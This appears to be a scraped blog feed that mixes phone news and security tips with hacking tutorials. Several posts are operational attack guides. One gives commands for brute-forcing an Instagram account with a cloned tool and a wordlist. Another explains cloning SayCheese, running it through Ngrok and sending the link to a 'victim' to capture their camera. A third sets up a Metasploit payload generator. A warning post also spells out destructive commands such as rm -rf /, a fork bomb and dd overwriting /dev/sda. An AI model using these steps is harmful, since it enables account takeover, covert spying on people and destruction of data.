Uncategorized

OnePlus Nord’s Android 11 update fixed, rollout resumes




The developers needed a few days to the fix issues in OnePlus Nord’s Android 11 update, which was paused due to bug reports coming in. A hotfix is rolling out for OnePlus Nord’s Android 11 update It sounds like all the reported bugs have been squashed. System Update to Android 11 version The brand new UI design brings you a more comfortable experience with various optimizations of details Optimized the stability of some third-party apps and improved experience Optimized power consumption to increase battery life Fixed the known issues Improved system stability Ambient Display Newly added Insight clock style, a joint creation with Parsons School of Design.

━━━━━━━━━━━━━

Uncategorized

OnePlus Watch is arriving on March 23




Now we know the OnePlus Watch is coming on March 23 alongside the OnePlus 9 series. OnePlus India March 12, 2021 In a post on its official forums, OnePlus said its “Fresh addition to the OnePlus family is healthy, punctual and even takes care of you while you sleep.” These wordings confirm the OnePlus Watch will come with health and fitness features and sleep tracking, but that’s hardly a surprise since most smartwatches come with those features these days. While OnePlus hasn’t divulged much about its smartwatch yet, it has announced a contest where nine winners will be rewarded with the company’s first smartwatch.

━━━━━━━━━━━━━

Uncategorized

Samsung Galaxy M42 to become the first 5G smartphone in the series




Back in November, we came across several certification listings for Samsung’s upcoming Galaxy M42 which confirmed a 6,000 mAh battery. Samsung Galaxy M42 Wi-Fi certification The model number in particular is significant as past international versions of 5G Samsung devices have all sported the B/DS marking which means the M42 will also be a 5G phone. Roid 11 confrimation The listing itself does not give out any additional spec details for the M42 apart from it having dual-mode Wi-Fi connectivity.

Uncategorized

5 Basic Tools For Password Cracking



——————————————————————————————
#1 John The Ripper :- John the Ripper is a free password cracking software tool. Originally developed for the Unix operating system, it can run on fifteen different platform.

#2 NCrack :- Crack is a Unix password cracking program designed to allow system administrators to locate users who may have weak passwords vulnerable to a dictionary attack. Crack was the first standalone password cracker for Unix systems and the first to introduce programmable dictionary generation.

#3 Hydra :- Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

#4 Medusa :- Medusa is a speedy, massively parallel, modular, login brute-forcer for network services created by the geeks at Foofus.net. It currently has modules for the following services: CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC, and a generic wrapper module.

#5 Aircrack-ng : Aircrack-ng is a Free and a Very Common Tool Used for Cracking Password of WPA,WPA2 Hashesh. It is Mainly Used For Wireless Pen Testing. By Using Aircrack-ng You Can Crack Passwords Via Brute Force or Wordlist Based Attack.

Uncategorized

How to Access DarkWeb or DeepWeb



Steps

There are many ways to access the dark web. Being a part of the deep net, dark web operates differently than the clear-net, and needs special client software to be accessed. While there are multiple ways to access the dark web, the most common and recommended method involves using TOR, and then visiting the .onion websites. All dark web website have a URL with .onion domain, which looks similar to the way the clear-net websites have .com, .org, .net, etc. Once you have TOR and find out the .onion address of a deep web site (hidden web site),you can simply enter it in the URL bar on TOR browser, and it’ll open, just as normal websites open in usual browsers.

If you read the previous boring section, you’d see that I mentioned how the dark net often uses uncommon communication protocols, etc. In case of the dark web, we see that phenomenon with respect to the onion websites. I won’t go in much depth, but first look at a .onion URL suggests that it’s similar to the clear-net websites. However, internally, the way they work is nothing similar to the clear-net. Precisely, .onion is not part of the internet’s DNS root, and hence, normal DNS servers can’t resolve your request if you type the URL of a .onion website on your browser. TOR redirects these requests through it’s own servers, similar to the way proxies work, and then we get to the website, without the involvement of DNS servers anywhere. This ensures that search engine bots can’t browse around the deep web, and that anonymity is maintained, both of the client looking at the web pages, as well as the server serving the web pages (In other words, the server doesn’t know who the client is, and the client doesn’t know anything about where the server is.)

If you’re using Windows, you can download the Tor executable on web..versions for linux and mac available also you can use in your android device but it’s not safe.

Uncategorized

#Huawei P50 series will be the first to come with HarmonyOS out of the box




The post about Huawei P50 and HarmonyOS Icons for new Petal apps/features As for existing devices, a mass migration to HarmonyOS is expected to start in April with high-end Huawei phones leading the way. In preparation for that migration, the company is expanding its Petal line of alternative services. Soon Huawei will unveil the Petal Assistant, a Petal keyboard and Petal Vision.

Uncategorized

List of all internet errors



– 400 (Bad request)

– 401 (Authorization required)

– 402 (Payment required)

– 403 (Forbidden)

– 404 (Not found)

– 405 (Method not allowed)

– 406 (Not acceptable)

– 407 (Proxy authentication required)

– 408 (Request Timeout)

– 409 (Conflict)

– 410 (Gone)

– 411 (Length required)

– 412 (Precondition failed)

– 413 (Request entity too large)

– 414 (Request URI too large)

– 415 (Unsupported media type)

– 416 (Request range not satisfiable)

– 417 (Expectation failed)

– 422 (Unprocessable entity)

– 423 (Locked)

– 424 (Failed dependency)

– 500 (Internal server error)

– 501 (Not Implemented)

– 502 (Bad gateway)

– 503 (Service unavailable)

– 504 (Gateway timeout)

– 505 (HTTP version not supported)

– 506 (Variant also negotiates)

– 507 (Insufficient storage)

– 510 (Not extended)

Uncategorized

Cross-site Scripting (XSS)



Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments.

A web page or web application is vulnerable to XSS if it uses unsanitized user input in the output that it generates. This user input must then be parsed by the victim’s browser. XSS attacks are possible in VBScript, ActiveX, Flash, and even CSS. However, they are most common in JavaScript, primarily because JavaScript is fundamental to most browsing experiences.

Uncategorized

FIREWALL IN ANY ANDROID DEVICE



DESCRIPTION: firewall is the security in any operating system that disallows all the dangerous IP’s and also the harmful programs to penetrates in the operating system

Steps To Add Firewall In Any Android Device:

Step 1. First of all, you need to download and install the cool android app that is NoRoot Firewall the app that will allow you to add firewall feature to your device.

Step 2. Now you need to launch the app after installing it in your device. Now you need to click on “Start”….

Step 3. Now you need to allow the connection, simply tap on “OK” to continue

Step 4. Now you need to move over the “Pending Access” tab and there you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish

That’s it! you are done, now your Android has a Firewall that will be securing your device from various threats.

Uncategorized

Generate metasploit Payloads in Easiest way using TM venom specially for Termux users




[!] Tmvenom :- Tmvenom is a python based tool specially designed for Termux users.This payload generates some basic payloads using metasploit-framework so You must install metasploit framework on your Termux.This tool works both rooted and non rooted devices.This is very helpfull for beginners.

Requirments:-

1. Termux App
2. metasploit-framework

Installation :


$ apt update

$ apt upgrade

$ apt install git

$ apt install python2

$ git clone https://github.com/TechnicalMujeeb/tmvenom

$ cd tmvenom

$ chmod +x *

$ sh install.sh

Usage :

$ python2 tmvenom.py
&
$ python2 tmvenom2.py

Now select payload options and you can easily generates payloads.

Uncategorized

ᴄʀᴀᴄᴋɪɴɢ ᴜsɪɴɢ ʙʀᴜᴛᴇ ғᴏʀᴄᴇ

“ᴄʀᴀᴄᴋɪɴɢ ᴜsɪɴɢ ʙʀᴜᴛᴇ ғᴏʀᴄᴇ (ᴏʀ ᴅɪᴄᴛɪᴏɴᴀʀʏ ᴀᴛᴛᴀᴄᴋ) ᴛᴀᴋᴇs ᴀ ʟᴏɴɢ ᴛɪᴍᴇ ᴀɴᴅ ᴏɴʟʏ ᴡᴏʀᴋs ᴡɪᴛʜ sɪᴍᴘʟᴇ ᴘᴀssᴡᴏʀᴅs. ɪᴛ ɪs ᴍᴜᴄʜ ʙᴇᴛᴛᴇʀ ᴛᴏ ᴄᴀʀʀʏ ᴏᴜᴛ ᴏᴛʜᴇʀ ᴍᴇᴛʜᴏᴅs sᴜᴄʜ ᴀs ᴘʜɪsɪɴɢ ʙᴇғᴏʀᴇ sᴜᴄᴄᴜᴍʙɪɴɢ ᴛᴏ ʙʀᴜᴛᴇ ғᴏʀᴄᴇ.”

ᴡʜᴀᴛ ʏᴏᴜ ᴡɪʟʟ ɴᴇᴇᴅ

ᴀɴ ᴏʙᴊᴇᴄᴛɪᴠᴇ ᴀᴄᴄᴏᴜɴᴛ ᴛᴏ ᴀᴛᴛᴀᴄᴋ

– ᴀ ᴄᴏᴍᴘᴜᴛᴇʀ ᴡɪᴛʜ ᴛʜᴇ “ᴋᴀʟɪ ʟɪɴᴜx” ᴏᴘᴇʀᴀᴛɪɴɢ sʏsᴛᴇᴍ (ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ᴅᴇʙɪᴀɴ ᴅɪsᴛʀɪʙᴜᴛɪᴏɴ).

– ᴅᴇᴄᴇɴᴛ ɪɴᴛᴇʀɴᴇᴛ ᴄᴏɴɴᴇᴄᴛɪᴏɴ 

ɪғ ʏᴏᴜ ᴅᴇᴄɪᴅᴇ ᴛᴏ ᴜɴʙʟᴏᴄᴋ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ ʏᴏᴜ ᴜɴᴅᴇʀsᴛᴀɴᴅ ᴘᴇʀғᴇᴄᴛʟʏ ᴛʜᴀᴛ ɪ ᴅᴏ ɴᴏᴛ ᴛᴀᴋᴇ ᴄʜᴀʀɢᴇ ᴏғ ᴛʜᴇ ᴜsᴇ ʏᴏᴜ ɢɪᴠᴇ ᴛᴏ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ ᴏғ ᴛʜɪs ᴘᴏsᴛ ᴀɴᴅ ɪ ᴡɪʟʟ ɴᴏᴛ ʙᴇ ʀᴇsᴘᴏɴsɪʙʟᴇ ғᴏʀ ʏᴏᴜʀ ᴀᴄᴛɪᴏɴs ᴏɴᴄᴇ ʏᴏᴜ ʜᴀᴠᴇ ᴜɴʟᴏᴄᴋᴇᴅ ᴛʜᴇ ᴄᴏɴᴛᴇɴᴛ. ᴛʜᴀɴᴋs ^^

1- sᴛᴀʀᴛ “ᴋᴀʟɪ ʟɪɴᴜx” ᴀɴᴅ ɢᴏ ᴛᴏ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ. ᴛʜᴇɴ, ᴛʏᴘᴇ ᴛʜᴇ ɴᴇxᴛ:

> sᴜᴅᴏ sᴜ

ᴀɴᴅ ᴘᴜᴛ ᴛʜᴇ ᴀᴅᴍɪɴ ᴘᴀssᴡᴏʀᴅ ᴛᴏ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ɪɴ ʀᴏᴏᴛ ᴍᴏᴅᴇ.

2- ɴᴏᴡ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴄʟᴏɴᴇ ᴛʜᴇ ᴛᴏᴏʟs ᴛʜᴀᴛ ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ᴜsᴇ. ᴛʏᴘᴇ:

> ᴄᴅ [ᴛʜᴇ ᴘᴀᴛʜ ᴡʜᴇʀᴇ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ᴅᴏ ᴛʜᴀᴛ]

> ɢɪᴛ ᴄʟᴏɴᴇ ʜᴛᴛᴘs: //ɢɪᴛʜᴜʙ. ᴄᴏᴍ/ᴇᴛʜɪᴄᴀʟ-ʜ4ᴄᴋ3ʀ/ɪɴsᴛᴀɢʀᴀᴍ      (ᴅᴇʟᴇᴛᴇ ᴛʜᴇ sᴘᴀᴄᴇs)

> ᴄᴅ ɪɴsᴛᴀɢʀᴀᴍ

3- ᴅᴏ ᴀ ʟs. ʏᴏᴜ ᴡɪʟʟ sᴇᴇ 3 ғɪʟᴇs/ᴅɪʀᴇᴄᴛᴏʀɪᴇs: “ᴄᴏʀᴇ”, “ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ” ᴀɴᴅ ᴀɴᴏᴛʜᴇʀ ғɪʟᴇ. ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ɢɪᴠᴇ ᴘᴇʀᴍɪssɪᴏɴs ᴛᴏ ᴛʜᴇ ᴛᴏᴏʟ. ᴛʏᴘᴇ ɪɴ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ:

> ᴄʜᴍᴏᴅ +x ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ

4- ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴀ ᴡᴏʀᴅʟɪsᴛ ғᴏʀ ᴘᴀssᴡᴏʀᴅs. ɪ ᴡɪʟʟ ɴᴏᴛ ᴇxᴘʟᴀɪɴ ʜᴏᴡ ᴛᴏ ᴅᴏ ᴛʜɪs ʙᴇᴄᴀᴜsᴇ ɪᴛ ɪs ᴄᴏᴍᴍᴏɴ sᴇɴsᴇ, ʙᴜᴛ ɪғ ʏᴏᴜ ʜᴀᴠᴇ ɴᴏ ɪᴅᴇᴀ ᴡʜᴇʀᴇ ᴛᴏ sᴛᴀʀᴛ ʏᴏᴜ ᴄᴀɴ ᴅᴏᴡɴʟᴏᴀᴅ ᴛᴏᴏʟs sᴜᴄʜ ᴀs “ᴄʀᴜɴᴄʜ” ᴏʀ “ᴄᴜᴘᴘ”, ɪɴsᴛᴀʟʟ ᴛʜᴇᴍ ᴀɴᴅ ᴍᴀᴋᴇ ᴀ ᴍᴀɴ ᴏғ ᴛʜᴇsᴇ ᴘʀᴏɢʀᴀᴍs ᴛᴏ ʟᴇᴀʀɴ ʜᴏᴡ ᴛᴏ ᴜsᴇ ᴛʜᴇᴍ. ᴏɴᴄᴇ ᴡᴇ ʜᴀᴠᴇ ᴀ ғɪʟᴇ ᴡɪᴛʜ ᴛʜᴇ ʟɪsᴛ ᴏғ ᴘᴏssɪʙʟᴇ ᴘᴀssᴡᴏʀᴅs, ᴡᴇ ᴍᴏᴠᴇ ᴏɴ ᴛᴏ ᴛʜᴇ ɴᴇxᴛ sᴛᴇᴘ.

5- ɴᴏᴡ, ᴡʜᴇɴ ᴡᴇ ʜᴀᴠᴇ ᴛʜᴇ ᴡᴏʀᴅʟɪsᴛ, ᴡᴇ ᴀʀᴇ ɢᴏɪɴɢ ᴛᴏ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴏᴏʟ ᴡɪᴛʜ ᴛʜᴇ ɴᴇxᴛ sʏɴᴛᴀx:

> ᴘʏᴛʜᴏɴ ɪɴsᴛᴀɢʀᴀᴍ.ᴘʏ [ᴜsᴇʀɴᴀᴍᴇ] [ᴘᴀᴛʜ ᴛᴏ ᴛʜᴇ ᴡᴏʀᴅʟɪsᴛ]

(ʀᴇᴍᴇᴍʙᴇʀ ᴛᴏ ᴅᴇʟᴇᴛᴇ ᴛʜᴇ ][ ᴡʜᴇɴ ʏᴏᴜ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴄᴏᴍᴍᴀɴᴅ)

6- ᴡᴀɪᴛ ᴜɴᴛɪʟ ᴛʜᴇ ᴘʀᴏᴄᴇss ɪs ғɪɴɪsʜᴇᴅ. ᴛʜᴇ ᴘʀᴏɢʀᴀᴍ ʙʏ ɪᴛsᴇʟғ ᴡɪʟʟ ʙᴇ ᴄʜᴇᴄᴋɪɴɢ ᴛʜᴇ ᴅɪғғᴇʀᴇɴᴛ ᴄᴏᴍʙᴏs ᴀɴᴅ ᴡɪʟʟ ᴀssɪɢɴ ᴀ ᴘʀᴏxʏ ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ.

7- ɪғ ᴛʜᴇ ᴘʀᴏɢʀᴀᴍ ғɪɴᴅs ᴛʜᴇ ᴘᴀssᴡᴏʀᴅ, ɪᴛ ᴡɪʟʟ ɴᴏᴛɪғʏ ʏᴏᴜ ᴀɴᴅ sʜᴏᴡ ʏᴏᴜ ɪᴛs ᴄᴏʀʀᴇsᴘᴏɴᴅɪɴɢ ᴘᴀssᴡᴏʀᴅ..

Uncategorized

How Do I Protect My Computer From Bots?


━━━━━━━━━━━━━
It’s very possible to protect your computer from bots, but it takes diligence and knowing what to look for. Use the following tips to keep your computer safe:

Install firewalls to block malicious attacks and never turn them off.

Use a long and complicated password that contains numbers and symbols.

Never use the same password for multiple programs.

Install quality anti-malware software such as Norton Security to protect your device.

Ensure software is up to date, and never ignore system updates.

Refrain from using flash drives, or thumb drives, in an infected computer.
━━━━━━━━━━━━━

Uncategorized

How to Hack any Device’s Camera over Internet



Using Kali, or Termux, you can hack any device’s front camera(be it 💻 or 📱) over Internet using SayCheese tool🔥

Requirements:
Kali Or Termux
Ngrok

If you are using Termux, please turn on your WIFI- Hotspot before using the tool

Steps to use

Download the repository by typing in the Terminal

git clone https://github.com/Anonymous3-SIT/saycheese.git

Goto SayCheese directory by typing the command

cd saycheese

Make them executable

chmod +x *

Run it

bash saycheese.sh

Select Option 2 (Ngrok)

Now, SayCheese will automatically download Ngrok and run it

Copy the link

Social Engineer it to the victim. Once he’ll allow camera access

Uncategorized

How to choose a VPN ?


━━━━━━━━━━━━━━
The best way to stay secure when using public Wi-Fi is to use a VPN solution, like Norton Secure VPN, which is compatible with Android and iOS smartphones and tablets, as well as Windows PCs and Apple Macs. Here are some questions to ask when you’re choosing a VPN provider.

Do they respect your privacy? 

The point of using a VPN is to protect your privacy, so it’s crucial that your VPN provider respects your privacy, too. They should have a no-log policy, which means that they never track or log your online activities.

Do they run the most current protocol? 

OpenVPN provides stronger security than other protocols, such as PPTP.

Do they set data limits? 

Depending on your Internet usage, bandwidth may be a large deciding factor for you. Make sure their services match your needs by checking to see if you’ll get full, unmetered bandwidth without data limits. Remember, some packages may not cost you money, but you’ll be subjected to frequent advertisements instead.

Where are the servers located? 

Decide which server locations are important to you. If you want to appear as if you’re accessing the Web from a certain locale, make sure there’s a server in that country.

Will you be able to set up VPN access on multiple devices? 

If you are like the average consumer, you use between three and five devices. Ideally, you’d be able to use the VPN on all of them at the same time.

What happens if the VPN goes down? 

Be sure that your provider implements a kill switch system in the event of failure. This means that your connection would automatically be locked down and would not default to an unsecured Internet connection if something goes wrong.

Uncategorized

What is Dark Web?



The “dark web” is a subset of the “deep web”. The deep web is just the part of the web that isn’t accessible by search engines. You won’t find these websites when you use a search engine like Google or Bing, but they’re otherwise normal websites. The “dark web” is a smaller part of the deep web that can’t be accessed without special software.
The dark web is a decentralized network of internet sites that try to make users as anonymous as possible by routing all their communications through multiple servers and encrypting it at every step.
The darknets which constitute the dark web include small, friend-to-friend peer-to-peer networks, as well as large, popular networks such as Tor, Freenet, I2P, and Riffle operated by public organizations and individuals. Users of the dark web refer to the regular web as Clearnet due to its unencrypted nature.The Tor dark web or onionland uses the traffic anonymization technique of onion routing under the network’s top-level domain suffix (.onion).

Uncategorized

#Samsung Galaxy Z Fold2 5G gets One UI 3.1 update




With One UI 3.1, multi-tasking becomes easier on the Galaxy Z Fold2 5G, since users can now quickly return to up to three previously opened Multi-Active Windows on the main screen via the Recents tab, while also being able to bring two Multi-Active Windows from the main screen to the cover screen. With One UI 3.1, Samsung syncs the weather widgets on the main and cover screens to offer the same information to the users while also allowing them to turn these screens off with a double-tap or a palm touch. In addition to all these improvements, Samsung has updated the Light and Dark themes on the Galaxy Z Fold2 5G with One UI 3.1 and redesigned the vertical volume slider to reduce the screen’s visual clutter.

Uncategorized

#Linux commands you should never run on your system





1- Linux administrator very often uses this command to format and assign the file system to the newly created disk partition.

But if used irresponsibly, this can also format the data drive on it:

$ mkfs.ext4 / dev / sda
Therefore, when using this command, make sure the correct disk partition is selected.


2- Remove directories / etc or / boot
/ etc contains all the system configuration files, and / boot contains all the kernel, InitRD, and GRUB files required to boot the system.

If you delete any of these folders, then your system will not boot:

$ rm -rf / etc
$ rm -rf / boot

Another way to remove your system configuration files and leave it irrecoverable is to use the following command:

$ find / -iname “* .conf” -exec rm -rf {} \;
This will find and remove all files ending in .conf (configuration files).

3- Delete entire filesystem
Most of you may know about this command, and it looks like this:

$ rm -rf /
This will remove the entire filesystem from your server, deleting every byte of data on the disk.

4- Fork bomb
This command creates copies of itself indefinitely, and in no time all the memory of your system will be clogged and therefore it will crash the system,

$ : () {: |: &} ;:
It can also damage the disc.

5- Fill the disk with random data

$ dd if = / dev / urandom of = / dev / sda
This will fill the disk with random data.

Another variation of this command overwrites the disk multiple times over the original data:
$ shred / dev / sda
This command is actually a useful tool, especially when you are throwing away your old drive and you don’t want the data from the old drive to fall into the wrong hands (and another way I learned from the movies is you can drill some holes in the drives as well) …

6- File Violation

All of the above commands are for deleting or overwriting data.
But there are ways to disable your system using file permissions.

First command:
$ chmod -Rv 000 /

This command will remove all file permissions for all files and folders on the system, and since no one will have permissions on files and folders, no one will be able to access them.
$ chown -R nobody: nobody /


ANY Doubt’s Shoot them on the discussion group.